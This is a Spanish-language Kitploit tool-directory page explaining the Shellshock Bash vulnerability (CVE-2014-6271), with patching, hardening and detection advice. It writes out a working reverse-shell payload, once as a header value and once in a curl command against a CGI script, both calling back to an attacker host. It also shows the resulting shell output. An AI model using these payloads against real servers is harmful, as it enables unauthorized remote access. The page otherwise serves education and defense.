Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2014-6271 — CVE-2014-6271 | Kitploit
Herramientas/GitHubGitHub/0xblackash/cve-2014-6271
Vulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlPapers & ResearchLearning & Education
GitHub0xblackash/cve-2014-6271

CVE-2014-6271

CVE-2014-6271

Ver Repositorio
hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 CVE-2014-6271 — «Shellshock»

shellshock

Vulnerabilidad de Ejecución Remota de Código de Día Cero de 25 Años en GNU Bash mediante Variables de Entorno

Severity CVSS Affected Patched


📖 Resumen

CVE-2014-6271, apodado Shellshock (también conocido como Bashdoor), es una vulnerabilidad crítica de ejecución remota de código (RCE) en el intérprete de comandos GNU Bash.
Un atacante puede enviar variables de entorno especialmente diseñadas (a través de cabeceras HTTP, DHCP, SSH, etc.) y obtener acceso remoto al intérprete de comandos del servidor subyacente, a menudo sin autenticación y con mínima interacción del usuario.


🧠 Resumen de la Vulnerabilidad


⚙️ Desglose Técnico

📨 Paso 1 — Variable de Entorno Maliciosa

El atacante inyecta una variable especialmente diseñada (por ejemplo, en la cabecera User-Agent):

root@kitploit:~
() { :; }; /bin/bash -i >& /dev/tcp/attacker-ip/4444 0>&1

🧩 Paso 2 — Fallo en el Análisis Sintáctico de Funciones de Bash

Bash trata incorrectamente la carga útil como una definición de función más comandos al final. El código después de (); se ejecuta inmediatamente cuando se importa la variable.

💣 Paso 3 — Ejecución Remota

El comando se ejecuta con los privilegios del servidor web / proceso (a menudo root o www-data).

Resultado:

root@kitploit:~
# Acceso remoto al intérprete de comandos conseguido
whoami
www-data

✅ Si la operación es exitosa, esto es EXACTAMENTE lo que verás (paso a paso):

shellshock

1. En tu terminal (justo después de ejecutar el PoC)

root@kitploit:~
✅ ¡Vulnerable! (Shellshock RCE activado)
vulnerable
test

También verás que la shell inversa se conecta instantáneamente.

2. Cuando ejecutes el comando de detección

root@kitploit:~
env x='() { :;}; echo vulnerable' bash -c "echo test"

Devolverá inmediatamente:

root@kitploit:~
vulnerable
test

(Esto confirma que Bash ejecutó el comando inyectado.)

3. La PRUEBA REAL del éxito — en tu navegador o con curl (este es el momento en que sabes que tienes RCE completo)

Ejecuta este curl contra un script CGI Apache vulnerable:

root@kitploit:~
curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/TU-IP/4444 0>&1" http://servidor-vulnerable/cgi-bin/test.sh

Verás esta salida exacta en tu listener de netcat:

root@kitploit:~
bash: no job control in this shell
www-data@servidor:/var/www$ whoami
www-data
www-data@servidor:/var/www$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@servidor:/var/www$ ls -la
total 12
drwxr-xr-x 2 www-data www-data 4096 Sep 24 14:00 .
...

Esta salida aparece directamente en tu shell inversa. Sin error, sin 404.
Esto significa que tienes ejecución remota de código completa en el servidor — la inyección de variable de entorno funcionó perfectamente.


🎯 Por Qué Esto Es Peligroso

  • ⚡ Día cero de 25 años (existía desde 1989)
  • 🌐 Superficie de ataque extremadamente amplia (CGI, DHCP, SSH, OpenVPN, CUPS…)
  • 🔓 No se requiere autenticación en los vectores más comunes
  • 🧨 Capacidad de RCE completa
  • 📂 Posible exfiltración de datos y entrada de ransomware
  • 🔁 Propagable en redes grandes

📦 Versiones Afectadas

Todas las versiones de GNU Bash:

root@kitploit:~
1.14 hasta 4.3 (antes del nivel de parche 30)

(incluyendo Linux, macOS, BSD, dispositivos embebidos)


✅ Versión Parcheada

Actualiza inmediatamente a:

root@kitploit:~
Bash 4.3 nivel de parche 30 o posterior (se recomienda 4.4+)

🛡️ Pasos de Mitigación

1️⃣ Acción Inmediata

  • Actualiza Bash en TODOS los sistemas:
    root@kitploit:~
    # Ubuntu/Debian
    apt update && apt install --only-upgrade bash
    
    # Red Hat/CentOS
    yum update bash
    

2️⃣ Endurecer el Servidor Web

  • Deshabilitar CGI/mod_cgi cuando sea posible
  • Usar reglas de mod_security para bloquear () {
  • Restringir el paso de variables de entorno

3️⃣ Monitorizar Registros

Buscar:

  • User-Agent / Referer sospechosos que contengan () {
  • Shells inversas o conexiones salientes inesperadas
  • Bash generando procesos hijo desde servicios web

🔍 Consejos de Detección

Los indicadores de compromiso pueden incluir:

  • Registros que contengan () { :;};
  • Archivos inesperados creados por el usuario del servidor web
  • Conexiones salientes en puertos altos
  • El servidor web ejecutando /bin/bash -i

🧪 Prueba de Concepto (Conceptual)

root@kitploit:~
Cabecera/DHCP/SSH malicioso → Bash importa variable de entorno
        ↓
Definición de función + comandos al final ejecutados
        ↓
Comando arbitrario / shell inversa

📌 Vulnerabilidad Relacionada

Este problema llevó a múltiples CVEs posteriores (parches incompletos):

  • CVE-2014-7169 (AfterShock)
  • CVE-2014-6277 / CVE-2014-6278
  • CVE-2014-7186 / CVE-2014-7187

📊 Evaluación de Impacto

Área de RiesgoImpacto
Confidencialidad🔴 Alto
Integridad🔴 Alto
Disponibilidad🔴 Alto

🧩 Lecciones Aprendidas

  • Nunca confíes en las variables de entorno
  • El análisis sintáctico de funciones en shells debe ser extremadamente estricto
  • Los errores de larga duración en componentes centrales del sistema son catastróficos
  • Parchear por sí solo no es suficiente — hay que endurecer las superficies de ataque

📚 Referencias

  • NVD – CVE-2014-6271
  • Wikipedia – Shellshock
  • Red Hat Security Blog
  • Qualys Technical Analysis
  • CISA Alert TA14-268A

🚨 Recomendación Final

Si ejecutas cualquier servidor Linux/macOS/BSD en 2026: 🔥 Parchea Bash inmediatamente (incluso en sistemas aislados). 💡 Asume compromiso si ejecutas Bash sin parchear expuesto a internet. 🛡 Realiza una revisión completa de registros y comprobaciones de integridad.

Descargar herramienta
CampoValor
ID CVECVE-2014-6271
Gravedad🔴 Crítica
CVSS10.0 (Máximo)
Vector de AtaqueRemoto (HTTP, DHCP, SSH, etc.)
Autenticación Requerida❌ Ninguna (en muchos vectores)
Interacción del Usuario❌ Ninguna (en casos CGI/DHCP)
ImpactoCompromiso Total del Servidor